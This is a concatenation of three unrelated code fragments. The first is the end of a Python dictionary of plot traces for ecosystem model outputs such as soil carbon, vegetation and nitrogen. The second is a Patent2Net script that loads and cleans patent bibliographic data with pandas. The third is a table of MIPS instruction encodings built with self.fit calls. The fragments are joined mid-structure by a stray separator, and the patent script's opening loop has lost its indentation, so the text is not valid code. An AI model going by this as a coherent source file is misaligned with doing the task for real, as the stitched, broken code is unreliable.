{ 'jsontag': 'PAR', 'axesnum': 4, },
]
},
'Soil': {
'desc': "A set of carbon soil variables.",
'rows': 6,
'cols': 1,
'traces': [
{ 'jsontag': 'LitterfallNitrogenPFT', 'axesnum': 0, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'TotNitrogenUptake', 'axesnum': 0, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'CarbonShallow', 'axesnum': 1, 'units': 'gC/m^2', },
{ 'jsontag': 'CarbonDeep', 'axesnum': 1, 'units': 'gC/m^2', },
{ 'jsontag': 'CarbonMineralSum', 'axesnum': 2, 'units': 'gC/m^2', },
{ 'jsontag': 'OrganicNitrogenSum', 'axesnum':3, 'units': 'gN/m^2', },
{ 'jsontag': 'AvailableNitrogenSum', 'axesnum':4, 'units': 'gN/m^2', },
{ 'jsontag': 'StNitrogenUptakeAll', 'axesnum': 4, 'units': 'gN/m^2', },
{ 'jsontag': 'InNitrogenUptakeAll', 'axesnum': 4, 'units': 'gN/m^2', },
{ 'jsontag': 'RH', 'axesnum': 5, 'units': 'gC/m^2',},
{ 'jsontag': 'RHraw', 'axesnum': 5, 'units': 'gC/m^2',},
{ 'jsontag': 'RHsoma', 'axesnum': 5, 'units': 'gC/m^2',},
{ 'jsontag': 'RHsomcr', 'axesnum': 5, 'units': 'gC/m^2',},
{ 'jsontag': 'RHsompr', 'axesnum': 5, 'units': 'gC/m^2',},
]
},
'Vegetation':{
'desc': "The standard targetted vegetation outputs",
'rows': 5,
'cols': 1,
'traces': [
{ 'jsontag': 'GPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{ 'jsontag': 'NPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{ 'jsontag': 'GPPAll', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'NPPAll', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'VegCarbon', 'axesnum': 2, 'units': 'gC/m^2','pft': '', 'pftpart': 'Leaf'},
{ 'jsontag': 'VegCarbon', 'axesnum': 2, 'units': 'gC/m^2','pft': '', 'pftpart': 'Stem'},
{ 'jsontag': 'VegCarbon', 'axesnum': 2, 'units': 'gC/m^2','pft': '', 'pftpart': 'Root'},
{ 'jsontag': 'LitterfallCarbonAll', 'axesnum': 2, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 3, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Leaf'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 3, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Stem'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 3, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Root'},
{ 'jsontag': 'LitterfallNitrogenPFT', 'axesnum': 4, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'TotNitrogenUptake', 'axesnum': 4, 'units': 'gN/m^2', 'pft': '', }
]
},
'VegExtra':{
'desc': "Some extra vegetation outputs",
'rows': 5,
'cols': 1,
'traces': [
{ 'jsontag': 'GPP', 'units': '', 'axesnum': 0, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'GPP', 'units': '', 'axesnum': 0, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'GPP', 'units': '', 'axesnum': 0, 'pft': '', 'pftpart':'Root' },
{ 'jsontag': 'NPP', 'units': '', 'axesnum': 1, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'NPP', 'units': '', 'axesnum': 1, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'NPP', 'units': '', 'axesnum': 1, 'pft': '', 'pftpart':'Root' },
{ 'jsontag': 'LitterfallCarbon', 'units': '', 'axesnum': 2, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'LitterfallCarbon', 'units': '', 'axesnum': 2, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'LitterfallCarbon', 'units': '', 'axesnum': 2, 'pft': '', 'pftpart':'Root' },
{ 'jsontag': 'LitterfallNitrogen', 'units': '', 'axesnum': 3, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'LitterfallNitrogen', 'units': '', 'axesnum': 3, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'LitterfallNitrogen', 'units': '', 'axesnum': 3, 'pft': '', 'pftpart':'Root' },
{ 'jsontag': 'RespMaint', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'RespMaint', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'RespMaint', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Root' },
{ 'jsontag': 'RespGrowth', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'RespGrowth', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'RespGrowth', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Root' },
]
},
'VegSoil':{
'desc': "The standard targetted vegetation and soil outputs",
'rows': 9,
'cols': 1,
'traces': [
{ 'jsontag': 'GPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{ 'jsontag': 'NPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{ 'jsontag': 'GPPAll', 'axesnum': 0, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'NPPAll', 'axesnum': 0, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'VegCarbon', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', 'pftpart': 'Leaf'},
{ 'jsontag': 'VegCarbon', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', 'pftpart': 'Stem'},
{ 'jsontag': 'VegCarbon', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', 'pftpart': 'Root'},
{ 'jsontag': 'LitterfallCarbonAll', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Leaf'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Stem'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Root'},
{ 'jsontag': 'LitterfallNitrogenPFT', 'axesnum': 3, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'TotNitrogenUptake', 'axesnum': 3, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'CarbonShallow', 'axesnum': 4, 'units': 'gC/m^2', },
{ 'jsontag': 'CarbonDeep', 'axesnum': 4, 'units': 'gC/m^2', },
{ 'jsontag': 'CarbonMineralSum', 'axesnum': 5, 'units': 'gC/m^2', },
{ 'jsontag': 'OrganicNitrogenSum', 'axesnum':6, 'units': 'gN/m^2', },
{ 'jsontag': 'AvailableNitrogenSum', 'axesnum':7, 'units': 'gN/m^2', },
{ 'jsontag': 'StNitrogenUptakeAll', 'axesnum': 7, 'units': 'gN/m^2', },
{ 'jsontag': 'InNitrogenUptakeAll', 'axesnum': 7, 'units': 'gN/m^2', },
{ 'jsontag': 'MossDeathC', 'axesnum': 8, 'units': 'gC/m^2', },
{ 'jsontag': 'MossdeathNitrogen', 'axesnum': 8, 'units': 'gC/m^2', },
]
},
'NCycle':{
'desc': "Viewing annual N cycle outputs",
'rows': 7,
'cols': 1,
'traces': [
{ 'jsontag': 'NetNMin', 'axesnum':0, 'units': 'gN/m^2', },
{ 'jsontag': 'NetNImmob', 'axesnum':0, 'units': 'gN/m^2', },
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 1, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Leaf'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 1, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Stem'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 1, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Root'},
{ 'jsontag': 'VegLabileNitrogen', 'axesnum': 1, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'LitterfallNitrogenPFT', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'TotNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', 'pft':'', },
{ 'jsontag': 'StNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'LabNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', | |
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 22 06:55:02 2021
@author: david
"""
import os
import pickle
import sys
import matplotlib.cm
import networkx as nx
import pandas as pd
from Patent2Net.P2N_Config import LoadConfig
from Patent2Net.P2N_Lib import LoadBiblioFile, UrlPatent, UrlApplicantBuild, UrlInventorBuild, UrlIPCRBuild, \
cmap_discretize, RenderTemplate
# from Patent2Net.P2N_Lib_Acad import IPCCategorizer, IPCExtractPredictionBrevet,PubMedCheckNameAndGetAffiliation, OPSChercheAbstractBrevet
from Patent2Net.P2N_Lib_Acad import NoPunct
def swap(x, y):
    """Return the two arguments as a tuple in reversed order."""
    return (y, x)
def swapList(liste):
    """Return a new two-element list with the elements of ``liste`` reversed."""
    assert(len(liste) == 2)
    return list(reversed(liste))
def cycle(liste):
    """
    Return the list of consecutive (item, next item) pairs from ``liste``.

    Returns None for an empty input and [] for a single-element list,
    matching the original behaviour.
    """
    if not liste:
        return None
    return list(zip(liste, liste[1:]))
# les trucs à virer des différents champs
Exclus = ['', ' ', 'empty', None, "none", "EMPTY"]
#####
# =============================================================================
#
# # CHARGEMENT des données brevet
#
# # =============================================================================
configFile = LoadConfig()
# Les champs nécessaires par brevet.
NeededInfo = ['label', 'date', 'inventor', 'title', 'abstract']
requete = configFile.requete
projectName = configFile.ndf
ndf = "Families"+ projectName
BiblioPath = configFile.ResultBiblioPath
ResultBiblioPath = configFile.ResultBiblioPath
temporPath = configFile.temporPath
ResultGephiPath = configFile.ResultGephiPath
ResultPathContent= configFile.ResultContentsPath
ResultAbstractPath = configFile.ResultAbstractPath
Auteur = configFile.ResultPath + '//AcadCorpora'
RepDir = configFile.ResultPath + '//AcadCorpora'
project = RepDir
for ndf in [projectName, "Families"+ projectName]:
if 'Description'+ndf in os.listdir(BiblioPath): # NEW 12/12/15 new gatherer append data to pickle file in order to consume less memory
print( "loading patent biblio data with ", " and ".join(NeededInfo), " fields.")
DataBrevet = LoadBiblioFile(BiblioPath, ndf)
print("Hi this is AcadStats processor. Bibliographic data of ", ndf, " patent universe found.")
print("Nice, ", len(DataBrevet["brevets"]), u" patents found")
# loading file from preProcessNormalisationNames
# inventors names are normalised there
if "InventeurNormes.pkl" in os.listdir(ResultBiblioPath + '//'):
with open(ResultBiblioPath + '//InventeurNormes.pkl', 'rb' ) as fic:
Inventeur_Norm = pickle.load(fic)
else:
Inventeur_Norm = dict()
for cle in Inventeur_Norm.keys():
Inventeur_Norm [cle] = [truc.title() for truc in Inventeur_Norm [cle]]
InvNormes = [aut.title() for cle in Inventeur_Norm.keys() for aut in Inventeur_Norm [cle]]
InvNormes = list(set(InvNormes))
# =============================================================================
# Paramètres
# =============================================================================
screenX = 1500 # taille des canevas de graphe par défaut
screenY = 1000
dicoAttrs = dict() # attributes for patent nodes
dicoAttrsAppli = dict() # attributes for applicant nodes..
dicoAttrsAut = dict() # attributes for author nodes
dicoAttrsCitP = dict()
dicoAttrsCitedBy = dict()
dicoAttrsEquiv = dict()
dicoAttrsOut = dict()
dicoAttrsTechno = dict()
Applicants = set ()
Techno = dict()
Inventeurs = set()
# =============================================================================
#
# Cleaning stuff and dataframe loading
#
# =============================================================================
df = pd.DataFrame(DataBrevet["brevets"])
# Rajout de colonne au df
df ['family lenght'] = 0
df ['IPCR11-range'] = df ['IPCR11'].apply(len)
df ['IPCR4-range'] = df ['IPCR4'].apply(len)
df ['IPCR7-range'] = df ['IPCR7'].apply(len)
# chargement du fichier famille puis calcul des tailles de famille par brevet
if ndf.startswith('Families'):
switch=''
else:
switch='Families'
print("\n> Hi! This is Net processor used on:", ndf)
if 'Description' + switch+ndf in os.listdir(ResultBiblioPath):
with open(ResultBiblioPath + '//' + switch+ndf, 'r') as data:
dico = LoadBiblioFile(ResultBiblioPath, switch +ndf)
else: # Retrocompatibility
print("please use Comptatibilizer")
sys.exit()
if 'Families' not in ndf:
df_Fam = pd.DataFrame(dico ["brevets"])
for bre in df['label']:
try:
df['family lenght'].loc[df.index[df['label'] == bre]] = df_Fam['family lenght'].loc[df_Fam.index[df_Fam['label'] == bre]].values[0]
except:
df['family lenght'].loc[df.index[df['label'] == bre]] = 0 #df_Fam['family lenght'].loc[df_Fam.index[bre in df_Fam['equivalents']]].values[0]
# print (df_Fam['family lenght'].loc[df_Fam.index[df_Fam['label'] == bre]])
# Cleaning df. These steps should be placed in preProcessNames.
# Row-by-row normalisation, written back with df.at: after this loop,
# 'label'/'Citations' are scalars and the inventor/applicant/IPCR*/citation
# fields are lists of cleaned strings ('empty' placeholders and entries found
# in Exclus are dropped).
for bre in df.itertuples():
    # Collapse one-element lists produced upstream into scalars.
    if isinstance(bre.label, list):
        df.at [bre.Index, 'label' ] = bre.label[0]
    if isinstance(bre.Citations, list):
        df.at [bre.Index, 'Citations' ] = bre.Citations[0]
    # A string 'equivalents' value becomes a one-element list ([] if excluded).
    if isinstance(bre.equivalents, str):
        if bre.equivalents not in Exclus:
            df.at [bre.Index, 'equivalents' ] = [bre.equivalents]
        else:
            df.at [bre.Index, 'equivalents' ] = []
    # normalising and cleaning
    # Inventors: hyphens become spaces, names are title-cased; 'empty'
    # placeholders and excluded names are dropped. Result is always a list.
    if not isinstance(bre.inventor, list):
        if bre.inventor.strip() not in Exclus:
            if ''.join(bre.inventor).strip().lower() != 'empty':
                temp = bre.inventor.replace('-', ' ')
                df.at [bre.Index, 'inventor' ] = [temp.title()]
            else:
                df.at [bre.Index, 'inventor' ] = []
        else:
            df.at [bre.Index, 'inventor' ] = []
    else:
        tempoinv = []
        for inv in bre.inventor:
            if ''.join(inv).strip().lower() != 'empty':
                # NOTE(review): in this list branch the hyphen replacement
                # happens BEFORE the Exclus test, unlike the scalar branch
                # above — confirm the asymmetry is intentional.
                inv = inv.replace('-', ' ')
                if inv.strip() not in Exclus:
                    tempoinv.append(inv.title())
        df.at [bre.Index, 'inventor' ] = tempoinv
    # Applicants: upper-cased; names also present among the inventors are
    # dropped. List-valued applicants are additionally accumulated into the
    # module-level Applicants set (scalar applicants are not).
    if not isinstance(bre.applicant, list):
        if bre.applicant not in Exclus and bre.applicant not in bre.inventor:
            if ''.join(bre.applicant).strip().lower() != 'empty':
                df.at [bre.Index, 'applicant' ] = [bre.applicant.upper()]
            else:
                df.at [bre.Index, 'applicant' ] = []
        else:
            df.at [bre.Index, 'applicant' ] = []
    else:
        tempoappl = []
        for appl in bre.applicant:
            if ''.join(appl).strip().lower() != 'empty' and appl not in bre.inventor:
                tempoappl.append(appl.upper())
        df.at [bre.Index, 'applicant' ] = tempoappl
        for appl in bre.applicant:
            if appl not in bre.inventor and appl not in Exclus:
                Applicants. add(appl.upper())
    # Special clean-up of unknown origin (original comment: "special clean
    # qu'on sait pas d'où çà sort"): re-join one-element IPC lists.
    if isinstance(bre.IPCR11, list):
        if len(bre.IPCR11) == 1:
            df.at [bre.Index, 'IPCR11' ] = [''.join (bre.IPCR11)]
    if isinstance(bre.IPCR7, list):
        if len(bre.IPCR7) == 1:
            df.at [bre.Index, 'IPCR7' ] = [''.join (bre.IPCR7)]
    if isinstance(bre.IPCR4, list):
        if len(bre.IPCR4) == 1:
            df.at [bre.Index, 'IPCR4' ] = [''.join (bre.IPCR4)]
    if isinstance(bre.IPCR3, list):
        if len(bre.IPCR3) == 1:
            df.at [bre.Index, 'IPCR3' ] = [''.join (bre.IPCR3)]
    # IPCR11: scalar values have '/' replaced by '-'; list values are
    # upper-cased after the same replacement.
    if not isinstance(bre.IPCR11, list):
        if bre.IPCR11 not in Exclus:
            if ''.join(bre.IPCR11).strip().lower() != 'empty':
                df.at [bre.Index, 'IPCR11' ] = [bre.IPCR11.replace('/', '-')]
            else:
                df.at [bre.Index, 'IPCR11' ] = []
        else:
            df.at [bre.Index, 'IPCR11' ] = []
    else:
        tempoinv = []
        for inv in bre.IPCR11:
            inv = inv.replace('/', '-')
            if ''.join(inv).strip().lower() != 'empty':
                if inv.strip() not in Exclus:
                    tempoinv.append(inv.upper())
        df.at [bre.Index, 'IPCR11' ] = tempoinv
    # IPCR7 / IPCR4 / IPCR3 / IPCR1: same shape; scalars are upper-cased and
    # wrapped in a list, lists are filtered and upper-cased.
    if not isinstance(bre.IPCR7, list):
        if bre.IPCR7 not in Exclus:
            if ''.join(bre.IPCR7).strip().lower() != 'empty':
                if bre.IPCR7.strip() not in Exclus:
                    df.at [bre.Index, 'IPCR7' ] = [bre.IPCR7.upper()]
                else:
                    df.at [bre.Index, 'IPCR7' ] = []
            else:
                df.at [bre.Index, 'IPCR7' ] = []
    else:
        tempoinv = []
        for inv in bre.IPCR7:
            if ''.join(inv).strip().lower() != 'empty':
                if inv.strip() not in Exclus:
                    tempoinv.append(inv.upper())
        df.at [bre.Index, 'IPCR7' ] = tempoinv
    if not isinstance(bre.IPCR4, list):
        if bre.IPCR4 not in Exclus:
            if ''.join(bre.IPCR4).strip().lower() != 'empty':
                if bre.IPCR4.strip() not in Exclus:
                    df.at [bre.Index, 'IPCR4' ] = [bre.IPCR4.upper()]
                else:
                    df.at [bre.Index, 'IPCR4' ] = []
            else:
                df.at [bre.Index, 'IPCR4' ] = []
    else:
        tempoinv = []
        for inv in bre.IPCR4:
            if ''.join(inv).strip().lower() != 'empty':
                if inv.strip() not in Exclus:
                    tempoinv.append(inv.upper())
        df.at [bre.Index, 'IPCR4' ] = tempoinv
    if not isinstance(bre.IPCR3, list):
        if bre.IPCR3 not in Exclus:
            if ''.join(bre.IPCR3).strip().lower() != 'empty':
                if bre.IPCR3.strip() not in Exclus:
                    df.at [bre.Index, 'IPCR3' ] = [bre.IPCR3.upper()]
                else:
                    df.at [bre.Index, 'IPCR3' ] = []
            else:
                df.at [bre.Index, 'IPCR3' ] = []
    else:
        tempoinv = []
        for inv in bre.IPCR3:
            # NOTE(review): IPCR3 tests Exclus before 'empty', the reverse of
            # the IPCR7/IPCR4/IPCR1 list branches — confirm this is intended.
            if inv.strip() not in Exclus:
                if ''.join(inv).strip().lower() != 'empty':
                    tempoinv.append(inv.upper())
        df.at [bre.Index, 'IPCR3' ] = tempoinv
    if not isinstance(bre.IPCR1, list):
        if bre.IPCR1 not in Exclus:
            if ''.join(bre.IPCR1).strip().lower() != 'empty':
                if bre.IPCR1.strip() not in Exclus:
                    df.at [bre.Index, 'IPCR1' ] = [bre.IPCR1.upper()]
                else:
                    df.at [bre.Index, 'IPCR1' ] = []
            else:
                df.at [bre.Index, 'IPCR1' ] = []
    else:
        tempoinv = []
        for inv in bre.IPCR1:
            if ''.join(inv).strip().lower() != 'empty':
                if inv.strip() not in Exclus:
                    tempoinv.append(inv.upper())
        df.at [bre.Index, 'IPCR1' ] = tempoinv
    # Citation-like fields: scalars become one-element lists (left untouched
    # when the scalar is excluded — 'equivalents' was already normalised
    # earlier in the loop); list values are deduplicated and filtered.
    if not isinstance(bre.equivalents, list):
        if bre.equivalents.strip() not in Exclus:
            df.at [bre.Index, 'equivalents' ] = [bre.equivalents]
    else:
        df.at [bre.Index, 'equivalents' ] = list (set([ipc for ipc in bre.equivalents if ipc.lower().strip() not in Exclus]))
    if not isinstance(bre.CitedBy, list):
        if bre.CitedBy.strip() not in Exclus:
            df.at [bre.Index, 'CitedBy' ] = [bre.CitedBy]
    else:
        df.at [bre.Index, 'CitedBy' ] = list (set([ipc for ipc in bre.CitedBy if ipc.lower().strip() not in Exclus]))
    if not isinstance(bre.CitP, list):
        if bre.CitP.strip() not in Exclus:
            df.at [bre.Index, 'CitP' ] = [bre.CitP]
    else:
        df.at [bre.Index, 'CitP' ] = list (set([ipc for ipc in bre.CitP if ipc.lower().strip() not in Exclus]))
    if not isinstance(bre.CitO, list):
        if bre.CitO.strip() not in Exclus:
            df.at [bre.Index, 'CitO' ] = [bre.CitO]
    else:
        df.at [bre.Index, 'CitO' ] = list (set([ipc for ipc in bre.CitO if ipc.lower().strip() not in Exclus]))
    # Sanity checks: every IPCR column must now hold a list for this row.
    assert(isinstance(df.at [bre.Index, 'IPCR1' ], list))
    assert(isinstance(df.at [bre.Index, 'IPCR11' ], list))
    assert(isinstance(df.at [bre.Index, 'IPCR3' ], list))
    assert(isinstance(df.at [bre.Index, 'IPCR7' ], list))
    assert(isinstance(df.at [bre.Index, 'IPCR4' ], list))
    # df.at [bre.Index, 'IPCR1' ] = [truc for truc in bre.IPCR1 if truc.strip() not in Exclus]
RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('ADDU', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 33]], [RD, RS, RT])
self.fit('AND', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 36]], [RD, RS, RT])
self.fit('ANDI', [[OPCODE, 12], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('DADD', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 44]], [RD, RS, RT])
self.fit('DADDI', [[OPCODE, 24], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('DADDIU', [[OPCODE, 25], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('DADDU', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 45]], [RD, RS, RT])
self.fit('DDIV', [[OPCODE, 0], RS, RT, 10, [OPCODE, 30]], [RS, RT])
self.fit('DDIVU', [[OPCODE, 0], RS, RT, 10, [OPCODE, 31]], [RS, RT])
self.fit('DIV', [[OPCODE, 0], RS, RT, 10, [OPCODE, 26]], [RS, RT])
self.fit('DIVU', [[OPCODE, 0], RS, RT, 10, [OPCODE, 27]], [RS, RT])
self.fit('DMULT', [[OPCODE, 0], RS, RT, 10, [OPCODE, 28]], [RS, RT])
self.fit('DMULTU', [[OPCODE, 0], RS, RT, 10, [OPCODE, 29]], [RS, RT])
self.fit('DSLL', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 56]], [RD, RT, SA])
self.fit('DSLL32', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 60]], [RD, RT, SA])
self.fit('DSLLV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 20]], [RD, RT, RS])
self.fit('DSRA', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 59]], [RD, RT, SA])
self.fit('DSRA32', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 63]], [RD, RT, SA])
self.fit('DSRAV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 23]], [RD, RT, RS])
self.fit('DSRL', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 58]], [RD, RT, SA])
self.fit('DSRL32', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 62]], [RD, RT, SA])
self.fit('DSRLV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 22]], [RD, RT, RS])
self.fit('DSUB', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 46]], [RD, RS, RT])
self.fit('DSUBU', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 47]], [RD, RS, RT])
self.fit('LUI', [[OPCODE, 15], 5, RD, IMMEDIATE], [RD, IMMEDIATE])
self.fit('MFHI', [[OPCODE, 0], 5, 5, RD, 5, [OPCODE, 16]], [RD])
self.fit('MFLO', [[OPCODE, 0], 5, 5, RD, 5, [OPCODE, 18]], [RD])
self.fit('MTHI', [[OPCODE, 0], RS, 15, [OPCODE, 17]], [RS])
self.fit('MTLO', [[OPCODE, 0], RS, 15, [OPCODE, 19]], [RS])
self.fit('MULT', [[OPCODE, 0], RS, RT, 10, [OPCODE, 24]], [RS, RT])
self.fit('MULTU', [[OPCODE, 0], RS, RT, 10, [OPCODE, 25]], [RS, RT])
self.fit('NOR', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 39]], [RD, RS, RT])
self.fit('OR', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 37]], [RD, RS, RT])
self.fit('ORI', [[OPCODE, 13], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('SLL', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 0]], [RD, RT, SA])
self.fit('SLLV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 4]], [RD, RT, RS])
self.fit('SLT', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 42]], [RD, RS, RT])
self.fit('SLTI', [[OPCODE, 10], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('SLTIU', [[OPCODE, 11], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
self.fit('SLTU', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 43]], [RD, RS, RT])
self.fit('SRA', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 3]], [RD, RT, SA])
self.fit('SRAV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 7]], [RD, RT, RS])
self.fit('SRL', [[OPCODE, 0], 5, RT, RD, SA, [OPCODE, 2]], [RD, RT, SA])
self.fit('SRLV', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 6]], [RD, RT, RS])
self.fit('SUB', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 34]], [RD, RS, RT])
self.fit('SUBU', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 35]], [RD, RS, RT])
self.fit('XOR', [[OPCODE, 0], RS, RT, RD, 5, [OPCODE, 38]], [RD, RS, RT])
self.fit('XORI', [[OPCODE, 14], RS, RD, IMMEDIATE], [RD, RS, IMMEDIATE])
# Jump and Branch Instructions
self.fit('BEQ', [[OPCODE, 4], RS, RT, OFFSET], [RS, RT, OFFSET])
self.fit('BEQL', [[OPCODE, 20], RS, RT, OFFSET], [RS, RT, OFFSET])
self.fit('BGEZ', [[OPCODE, 1], RS, [FMT, 1], OFFSET], [RS, OFFSET])
self.fit('BGEZAL', [[OPCODE, 1], RS, [FMT, 17], OFFSET], [RS, OFFSET])
self.fit('BGEZALL', [[OPCODE, 1], RS, [FMT, 19], OFFSET], [RS, OFFSET])
self.fit('BGEZL', [[OPCODE, 1], RS, [FMT, 3], OFFSET], [RS, OFFSET])
self.fit('BGTZ', [[OPCODE, 7], RS, 5, OFFSET], [RS, OFFSET])
self.fit('BGTZL', [[OPCODE, 23], RS, 5, OFFSET], [RS, OFFSET])
self.fit('BLEZ', [[OPCODE, 6], RS, 5, OFFSET], [RS, OFFSET])
self.fit('BLEZL', [[OPCODE, 22], RS, 5, OFFSET], [RS, OFFSET])
self.fit('BLTZ', [[OPCODE, 1], RS, 5, OFFSET], [RS, OFFSET])
self.fit('BLTZAL', [[OPCODE, 1], RS, [FMT, 16], OFFSET], [RS, OFFSET])
self.fit('BLTZALL', [[OPCODE, 1], RS, [FMT, 18], OFFSET], [RS, OFFSET])
self.fit('BLTZL', [[OPCODE, 1], RS, [FMT, 2], OFFSET], [RS, OFFSET])
self.fit('BNEL', [[OPCODE, 21], RS, RT, OFFSET], [RS, RT, OFFSET])
self.fit('BNE', [[OPCODE, 5], RS, RT, OFFSET], [RS, RT, OFFSET])
self.fit('J', [[OPCODE, 2], ADDRESS], [ADDRESS])
self.fit('JAL', [[OPCODE, 3], ADDRESS], [ADDRESS])
self.fit('JALR', [[OPCODE, 0], RS, 5, RT, 5, [OPCODE, 9]], [RT, RS])
self.fit('JR', [[OPCODE, 0], RT, 15, [OPCODE, 8]], [RT])
# Special Instructions
self.fit('BREAK', [[OPCODE, 0], CODE_20, [OPCODE, 13]], [CODE_20])
self.fit('SYSCALL', [[OPCODE, 0], CODE_20, [OPCODE, 12]], [CODE_20])
# Exception Instructions
self.fit('TEQ', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 52]], [CODE_10, RS, RT])
self.fit('TEQI', [[OPCODE, 1], RS, [FMT, 12], IMMEDIATE], [RS, IMMEDIATE])
self.fit('TGE', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 48]], [CODE_10, RS, RT])
self.fit('TGEI', [[OPCODE, 1], RS, [FMT, 8], IMMEDIATE], [RS, IMMEDIATE])
self.fit('TGEIU', [[OPCODE, 1], RS, [FMT, 9], IMMEDIATE], [RS, IMMEDIATE])
self.fit('TGEU', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 49]], [CODE_10, RS, RT])
self.fit('TLT', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 50]], [CODE_10, RS, RT])
self.fit('TLTI', [[OPCODE, 1], RS, [FMT, 10], IMMEDIATE], [RS, IMMEDIATE])
self.fit('TLTIU', [[OPCODE, 1], RS, [FMT, 11], IMMEDIATE], [RS, IMMEDIATE])
self.fit('TLTU', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 51]], [CODE_10, RS, RT])
self.fit('TNE', [[OPCODE, 0], RS, RT, CODE_10, [OPCODE, 54]], [CODE_10, RS, RT])
self.fit('TNEI', [[OPCODE, 1], RS, [FMT, 14], IMMEDIATE], [RS, IMMEDIATE])
# System Control Processor (COP0) Instructions
